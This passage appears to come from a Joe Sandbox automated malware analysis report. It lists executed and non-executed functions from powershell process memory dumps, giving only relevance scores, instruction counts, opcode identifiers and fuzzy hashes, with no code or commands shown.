                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1f2b612485430eafbcf3af77bd768f68a6d1f07685298f81f731f6b2af7f63f
                                                                                                                              • Instruction ID: bd6c14ab9b67df44de6e3a863181ac3a4e6d2e17e157644089cd6e3e9480c077
                                                                                                                              • Opcode Fuzzy Hash: e1f2b612485430eafbcf3af77bd768f68a6d1f07685298f81f731f6b2af7f63f
                                                                                                                              • Instruction Fuzzy Hash: AE221AB2A0EA8D4FE765EB6888656747BE1EF5A310F1900FFD09DC71E3DA25A805C701
                                                                                                                              Function 00007FFD9B8C4E85 Relevance: .4, Instructions: 437COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d653f8de2240128b4dbed79bea0a662b41766384bab4604a78eeb0203d291ff6
                                                                                                                              • Instruction ID: 247dfc804816eac13c0fd3363ca40d4403f6c6f2e137991000c16bf5d48cf15c
                                                                                                                              • Opcode Fuzzy Hash: d653f8de2240128b4dbed79bea0a662b41766384bab4604a78eeb0203d291ff6
                                                                                                                              • Instruction Fuzzy Hash: 52D13972A1FA8E0FEBA5ABA848755B57BD0EF59314B0901FFD05DCB0E3DA18A905C341
                                                                                                                              Function 00007FFD9B7F3795 Relevance: .4, Instructions: 353COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1989686560.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b7f0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dd059c517131d3f85f3624c7a814af3876090f57aa2a241e2d44d668109dfd04
                                                                                                                              • Instruction ID: 4f4cb11305e85de30ffcec87ae312cdfc91cbf775e40732a5b9d04617f39c927
                                                                                                                              • Opcode Fuzzy Hash: dd059c517131d3f85f3624c7a814af3876090f57aa2a241e2d44d668109dfd04
                                                                                                                              • Instruction Fuzzy Hash: EEC13031B19A4D8FDF94DF98C465AADBBE1FF68300F164266D409D72A5CA34E881CBD0
                                                                                                                              Function 00007FFD9B8C4503 Relevance: .3, Instructions: 266COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8ff0457d41c2d89d8a4cf5a62e28b2773566b59c230cd57493225d974b05a06a
                                                                                                                              • Instruction ID: 94e0ebaa50335201b2f15e0df26f21255929f436bf444e4e83c9b2d7920f3249
                                                                                                                              • Opcode Fuzzy Hash: 8ff0457d41c2d89d8a4cf5a62e28b2773566b59c230cd57493225d974b05a06a
                                                                                                                              • Instruction Fuzzy Hash: AE810562A0E7C90FE762A76898649B17FE1DF5B210B0E01FFD489CB0E7D9189949C352
                                                                                                                              Function 00007FFD9B8C451A Relevance: .2, Instructions: 216COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6754bc3aaa80f72725473eb698a6911fc9db0a160b5450a8f1e9c6fd478d534f
                                                                                                                              • Instruction ID: 14112159ac74a795b897aa775483d99ab152d7b6c801f3664735a7e32e9fa28b
                                                                                                                              • Opcode Fuzzy Hash: 6754bc3aaa80f72725473eb698a6911fc9db0a160b5450a8f1e9c6fd478d534f
                                                                                                                              • Instruction Fuzzy Hash: 2461B29190F7CA0FE76397B888759A13FE19F57210B0E41EFD489CB0E7D919994AC312
                                                                                                                              Function 00007FFD9B8C1391 Relevance: .2, Instructions: 204COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ffcf0bac076b599675c021c7c917bd27e6c3d0de268e5b60f5ed4ce8551a6919
                                                                                                                              • Instruction ID: 5e46a35a73a24610b405642d0247825e24ae503298a908f08795628ace717ac3
                                                                                                                              • Opcode Fuzzy Hash: ffcf0bac076b599675c021c7c917bd27e6c3d0de268e5b60f5ed4ce8551a6919
                                                                                                                              • Instruction Fuzzy Hash: BA51F692B0FACA0FD7A5A77C58E01B07FD2DF5A260B0A01FBD059CB1E3D9196C458351
                                                                                                                              Function 00007FFD9B8C0192 Relevance: .1, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4bf338d9274fda5ed914700d9add328ad946d7f4fff9611fb9abe42d1227ce8c
                                                                                                                              • Instruction ID: 9c21b5e783aef8282ddc6148a1bd65eac01e01de32c6c210cd21002a4f73a538
                                                                                                                              • Opcode Fuzzy Hash: 4bf338d9274fda5ed914700d9add328ad946d7f4fff9611fb9abe42d1227ce8c
                                                                                                                              • Instruction Fuzzy Hash: 2031D462A5FBC60FD7A35BB408A54607FB0EF16650B4A00FBD458CB1E3E91C5C458712
                                                                                                                              Function 00007FFD9B7F5285 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1989686560.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b7f0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cb8c3f721682ae74389d8b835afade324bfcebf8bc5b29fe6ff483c1d2d80a3
                                                                                                                              • Instruction ID: cede955fff695cdf052e9aa63f952841fa75aa565bb086fee38127738a92e839
                                                                                                                              • Opcode Fuzzy Hash: 4cb8c3f721682ae74389d8b835afade324bfcebf8bc5b29fe6ff483c1d2d80a3
                                                                                                                              • Instruction Fuzzy Hash: 2701A77020CB0C4FD748EF0CE051AA9B7E0FB95320F10066DE58AC36A1D632E881CB45

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FFD9B8B1391 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: j
                                                                                                                              • API String ID: 0-2137352139
                                                                                                                              • Opcode ID: d9b4512b8e77d6f950240df67cbd4f6fa99d1ad936dd38cf67d161f85b058d37
                                                                                                                              • Instruction ID: 020368aef14acfa0e6ea8bdea5d21c139751afe8d2a43c420312a872c158c84f
                                                                                                                              • Opcode Fuzzy Hash: d9b4512b8e77d6f950240df67cbd4f6fa99d1ad936dd38cf67d161f85b058d37
                                                                                                                              • Instruction Fuzzy Hash: 54510612B1FADA0FD7A9977858B45B07BD2DF5A26070901FBD049CF1E3E91C5C058391
                                                                                                                              Function 00007FFD9B8B1706 Relevance: .7, Instructions: 694COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6b2ff1f5b0fbbf0e5404d12c01d703c312802ab222aefd9c1e1fadeed82decf4
                                                                                                                              • Instruction ID: ffc330060b26e8092cfe3cb13b9b43089a9d9c15facf0c964b2806005f25aeb0
                                                                                                                              • Opcode Fuzzy Hash: 6b2ff1f5b0fbbf0e5404d12c01d703c312802ab222aefd9c1e1fadeed82decf4
                                                                                                                              • Instruction Fuzzy Hash: 93222832A0EACD4FE765DB6888656647FE1EF5A310F0900BED05DCB1E3DA29AC46C741
                                                                                                                              Function 00007FFD9B7E780C Relevance: .5, Instructions: 505COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 906d1fc16e5ea6002d4a93ca51cd83e3c23669908738323c4fe887b9c5e5c037
                                                                                                                              • Instruction ID: a4dc95f4b05e2dd730e87a223b462857775b07dd89c7ba91970dae0f5505f727
                                                                                                                              • Opcode Fuzzy Hash: 906d1fc16e5ea6002d4a93ca51cd83e3c23669908738323c4fe887b9c5e5c037
                                                                                                                              • Instruction Fuzzy Hash: D7F1C231A09A4D8FDF99DF5CC455AE977E1FF68300F1542AAD449D72B6CA24EC82CB80
                                                                                                                              Function 00007FFD9B8B4E85 Relevance: .4, Instructions: 436COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f13f85dfafe77f0712d0f4eb0738d040cf5b9d1c1bafb560c67e85c31dfeb9b
                                                                                                                              • Instruction ID: 2a8f6bf34eea3bebc8d47bbe15e641424e62cdfbdaa737ca6be56d8e908ff137
                                                                                                                              • Opcode Fuzzy Hash: 7f13f85dfafe77f0712d0f4eb0738d040cf5b9d1c1bafb560c67e85c31dfeb9b
                                                                                                                              • Instruction Fuzzy Hash: 41D13932A0EADE0FEBA5ABB848755B57B90EF59314B0900FED05DC71E3DA18A905C781
                                                                                                                              Function 00007FFD9B7E65F1 Relevance: .4, Instructions: 378COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b5b4700cabef836036bf597283c46e6f7da52146864f40bff394f5d653fdb88
                                                                                                                              • Instruction ID: 5b053de456ea2f6cf03f955e19496483f12ece1bc8953c79bfc6a6b5d9d9c4c5
                                                                                                                              • Opcode Fuzzy Hash: 7b5b4700cabef836036bf597283c46e6f7da52146864f40bff394f5d653fdb88
                                                                                                                              • Instruction Fuzzy Hash: 3EB1053160E7865FD3169B6898B55E67FE0EF4322470941FFD0DACB0B3DA18A846C752
                                                                                                                              Function 00007FFD9B8B0192 Relevance: .1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 70669dd4feca5861035ef85efb8b8b170a9e3d7745deaf1e3bc91b0d18e33f36
                                                                                                                              • Instruction ID: 365cfe236e6a3154c5335fc86edacb0818c22bd37890b9abfe96547a2a4355df
                                                                                                                              • Opcode Fuzzy Hash: 70669dd4feca5861035ef85efb8b8b170a9e3d7745deaf1e3bc91b0d18e33f36
                                                                                                                              • Instruction Fuzzy Hash: C631E222A5FBC60FD7978BB408A40A47FA0AF1621070A00FBC458CB1E3EE1C5D49C752
                                                                                                                              Function 00007FFD9B7E5285 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b3b48bb651b24c5904a2e5de7f68eba3516205580f8bd00a310b272f7710fa95
                                                                                                                              • Instruction ID: a0c2167b1b0d3f3826e60bf6f62beef7faf3de671d7ee8a2a08a44b671a440d9
                                                                                                                              • Opcode Fuzzy Hash: b3b48bb651b24c5904a2e5de7f68eba3516205580f8bd00a310b272f7710fa95
                                                                                                                              • Instruction Fuzzy Hash: DA01A77020CB0C4FD748EF0CE051AA9B3E0FF95320F10056DE58AC36A1D632E881CB41

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00007FFD9B7E201D Relevance: .7, Instructions: 722COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 83ed62d47606199f9d7f12c300a1b2e1bbcbe199add39a21fb519036c28fdf54
                                                                                                                              • Instruction ID: 7781458d0334df7671a25e6a5c07c8ee658d80e52a3d7f56c431cd9407ec5b90
                                                                                                                              • Opcode Fuzzy Hash: 83ed62d47606199f9d7f12c300a1b2e1bbcbe199add39a21fb519036c28fdf54
                                                                                                                              • Instruction Fuzzy Hash: B222E067B0F7D24FE7228AB998751E47FA0EF5366570A01F7C0D48B0F3E919690A8361